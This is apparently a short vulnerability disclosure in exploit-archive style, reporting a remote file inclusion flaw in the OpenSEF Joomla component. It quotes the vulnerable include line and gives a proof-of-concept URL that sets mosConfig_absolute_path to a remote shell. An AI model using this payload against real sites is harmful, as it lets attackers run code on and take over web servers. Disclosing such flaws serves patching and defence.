###########################################################################################
    #      Aria-Security.net Advisory                                        #
    #      Discovered  by: O.U.T.L.A.W                                       #      #      < www.Aria-security.net >                                          #
    #    Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                          #
    #                                                      #
    ###########################################################################################


#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly) 
#Source:
   
 require_once( $mosConfig_absolute_path . '/includes/sef.php' );
  } else {
    // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
    //


************************************************************************************

                         
#Proof of Concept:                       
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#                
#----------------------------------------------------------                               
#                                                         
#                                      
#Contact : Outlaw@aria-security.net